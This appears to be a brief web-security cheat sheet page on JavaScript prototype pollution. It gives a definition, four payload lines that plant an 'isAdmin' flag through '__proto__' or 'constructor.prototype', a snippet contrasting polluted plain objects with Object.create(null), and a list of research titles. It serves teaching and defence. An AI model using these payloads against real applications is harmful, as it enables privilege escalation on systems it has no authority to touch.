Prototype Pollution

Definition

Prototype pollution is a security vulnerability in JavaScript where an attacker modifies a prototype of a standard object, potentially leading to unintended side effects or behavior in applications that rely on those objects.

Payloads

obj.__proto__.isAdmin = true;
obj["__proto__"]["isAdmin"] = true;

obj.constructor.prototype.isAdmin = true;
obj["constructor"]["prototype"]["isAdmin"] = true;

Mitigation

({}).isAdmin
=> true

Object.create(null).isAdmin
=> undefined

Resources

Server-side prototype pollution: Black-box detection without the DoS
Server side prototype pollution, how to detect and exploit
Research on Prototype Pollution
CodeQL Prototype-polluting function

Parsing

Pug

Docs

OffensiveWeb

Title here

Prototype Pollution

Definition

Payloads

Mitigation

Resources

Prototype Pollution

Definition#

Payloads#

Mitigation#

Resources#

Definition

Payloads

Mitigation

Resources